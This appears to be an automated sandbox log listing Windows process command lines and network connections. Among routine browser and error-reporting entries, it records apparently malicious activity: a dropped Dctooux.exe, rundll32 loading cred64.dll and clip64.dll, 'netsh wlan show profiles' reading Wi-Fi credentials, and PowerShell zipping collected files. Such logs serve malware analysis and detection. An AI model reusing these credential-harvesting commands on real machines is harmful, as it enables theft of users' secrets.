"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --mojo-platform-channel-handle=5468 --field-trial-handle=3084,i,14217130992253490921,11543335378077656547,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4332 --field-trial-handle=3084,i,14217130992253490921,11543335378077656547,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --mojo-platform-channel-handle=5688 --field-trial-handle=3084,i,14217130992253490921,11543335378077656547,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --mojo-platform-channel-handle=5684 --field-trial-handle=3084,i,14217130992253490921,11543335378077656547,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=2396 --field-trial-handle=3084,i,14217130992253490921,11543335378077656547,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=5468 --field-trial-handle=3084,i,14217130992253490921,11543335378077656547,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --mojo-platform-channel-handle=5292 --field-trial-handle=3084,i,14217130992253490921,11543335378077656547,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --mojo-platform-channel-handle=5332 --field-trial-handle=3084,i,14217130992253490921,11543335378077656547,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --mojo-platform-channel-handle=5460 --field-trial-handle=3084,i,14217130992253490921,11543335378077656547,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=3540 --field-trial-handle=3084,i,14217130992253490921,11543335378077656547,262144 --variations-seed-version /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffbc8b39758,0x7ffbc8b39768,0x7ffbc8b39778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1816 --field-trial-handle=1836,i,15335679528855565204,2605671269193512019,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1836,i,15335679528855565204,2605671269193512019,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2272 --field-trial-handle=1836,i,15335679528855565204,2605671269193512019,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3144 --field-trial-handle=1836,i,15335679528855565204,2605671269193512019,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3276 --field-trial-handle=1836,i,15335679528855565204,2605671269193512019,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3968 --field-trial-handle=1836,i,15335679528855565204,2605671269193512019,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4952 --field-trial-handle=1836,i,15335679528855565204,2605671269193512019,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5152 --field-trial-handle=1836,i,15335679528855565204,2605671269193512019,131072 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\2\RegAsm.exe
C:\Users\Admin\AppData\Local\Temp\2\RegAsm.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5356 --field-trial-handle=1836,i,15335679528855565204,2605671269193512019,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=5164 --field-trial-handle=1836,i,15335679528855565204,2605671269193512019,131072 /prefetch:1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1476 -ip 1476
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 1392
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1476 -ip 1476
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 1600
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5372 --field-trial-handle=1836,i,15335679528855565204,2605671269193512019,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4892 --field-trial-handle=1836,i,15335679528855565204,2605671269193512019,131072 /prefetch:8
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /7
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 1476 -ip 1476
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 652
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe
C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 5548 -ip 5548
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5548 -s 520
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5548 -ip 5548
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5548 -s 560
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 788 -p 5548 -ip 5548
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5548 -s 568
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5548 -ip 5548
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5548 -s 616
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 812 -p 5548 -ip 5548
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5548 -s 720
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 788 -p 5548 -ip 5548
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5548 -s 740
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 796 -p 5548 -ip 5548
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5548 -s 740
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 832 -p 5548 -ip 5548
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5548 -s 860
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 820 -p 5548 -ip 5548
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5548 -s 852
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 844 -p 5548 -ip 5548
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5548 -s 1096
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 896 -p 5548 -ip 5548
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5548 -s 1248
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffbb9759758,0x7ffbb9759768,0x7ffbb9759778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1812 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2144 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2204 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3112 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3120 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4676 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5088 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5088 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:8
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 864 -p 5548 -ip 5548
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5548 -s 1452
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\5ebdeb3f981e75\cred64.dll, Main
C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\5ebdeb3f981e75\cred64.dll, Main
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4928 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=5088 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=5408 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:1
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\5ebdeb3f981e75\cred64.dll, Main
C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\5ebdeb3f981e75\cred64.dll, Main
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\5ebdeb3f981e75\cred64.dll, Main
C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\5ebdeb3f981e75\cred64.dll, Main
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3340 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4888 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5660 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5156 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5768 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:8
C:\Users\Admin\Downloads\ClassicShell.exe
"C:\Users\Admin\Downloads\ClassicShell.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5848 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:8
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\5ebdeb3f981e75\clip64.dll, Main
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\5ebdeb3f981e75\clip64.dll, Main
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\904519900954_Desktop.zip' -CompressionLevel Optimal
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\5ebdeb3f981e75\clip64.dll, Main
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 908 -p 5548 -ip 5548
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5548 -s 1420
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\904519900954_Desktop.zip' -CompressionLevel Optimal
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\904519900954_Desktop.zip' -CompressionLevel Optimal
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 900 -p 5548 -ip 5548
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5548 -s 1496
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=1672 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=1156 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3372 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6036 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3760 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:8
C:\Users\Admin\Downloads\IconDance.exe
"C:\Users\Admin\Downloads\IconDance.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2384 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:2
C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE
"C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE" /verb open "C:\Users\Admin\Desktop\DebugConvertFrom.xml"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3720 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5984 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5808 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3320 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5816 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:8
C:\Users\Admin\Downloads\DesktopPuzzle.exe
"C:\Users\Admin\Downloads\DesktopPuzzle.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 908 -p 5548 -ip 5548
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5548 -s 1036
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 920 -p 5548 -ip 5548
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5548 -s 728
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | dl1.cbsistatic.com | udp |
| US | 8.8.8.8:53 | download.cnet.com | udp |
| US | 151.101.1.91:443 | download.cnet.com | tcp |
| US | 151.101.1.91:443 | download.cnet.com | tcp |
| US | 151.101.1.91:443 | download.cnet.com | tcp |
| US | 8.8.8.8:53 | cdn.cohesionapps.com | udp |
| US | 8.8.8.8:53 | 23.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.1.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.178.17.96.in-addr.arpa | udp |
| GB | 18.244.140.25:443 | cdn.cohesionapps.com | tcp |
| GB | 18.244.140.25:443 | cdn.cohesionapps.com | tcp |
| US | 8.8.8.8:53 | c.go-mpulse.net | udp |
| US | 151.101.1.91:443 | download.cnet.com | tcp |
| GB | 23.39.224.128:445 | c.go-mpulse.net | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| US | 8.8.8.8:53 | 232.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.140.244.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.39.156.108.in-addr.arpa | udp |
| US | 151.101.1.91:443 | download.cnet.com | tcp |
| US | 151.101.1.91:443 | download.cnet.com | tcp |
